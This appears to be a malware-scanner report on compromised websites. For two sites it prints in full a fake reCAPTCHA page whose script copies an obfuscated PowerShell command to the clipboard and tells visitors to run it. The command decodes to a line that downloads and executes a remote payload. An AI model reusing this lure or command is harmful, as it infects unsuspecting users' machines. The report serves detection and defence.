{\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://bmdcompany.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://bmdcompany.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://www.zamilgroups.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://www.zamilgroups.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://lucprofessional.grupomoltz.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://laborpartyjo.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://laborpartyjo.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 